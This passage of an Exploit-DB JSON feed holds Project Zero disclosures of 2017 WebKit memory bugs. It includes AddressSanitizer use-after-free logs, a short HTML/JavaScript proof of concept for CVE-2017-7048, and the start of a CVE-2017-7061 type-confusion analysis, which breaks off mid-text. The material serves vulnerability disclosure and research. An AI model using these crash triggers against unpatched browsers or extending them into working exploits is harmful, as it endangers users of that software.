0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in 
WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in 
WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in 
WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42365/"}, {"lastseen": "2017-07-24T19:42:10", "description": "WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free. CVE-2017-7048. Dos exploit for Multiple platform. 
Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42360", "href": "https://www.exploit-db.com/exploits/42360/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249\r\n\r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in 
WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, 
WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in 
JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n #31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)\r\n #32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)\r\n #33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)\r\n #34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)\r\n #35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)\r\n #36 0x10a676103 in WebCore::Document::implicitClose() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\n==728==ABORTING\r\n-->\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42360/"}, {"lastseen": "2017-09-12T22:52:25", "description": "WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization. CVE-2017-7061. Dos exploit for Multiple platform", "published": "2017-09-12T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "id": "EDB-ID:42666", "href": "https://www.exploit-db.com/exploits/42666/", "sourceData": "Let's start with JS code.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = 
static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n\r\nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string (\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n\r\nlet o = {};\r\nfor (let i in 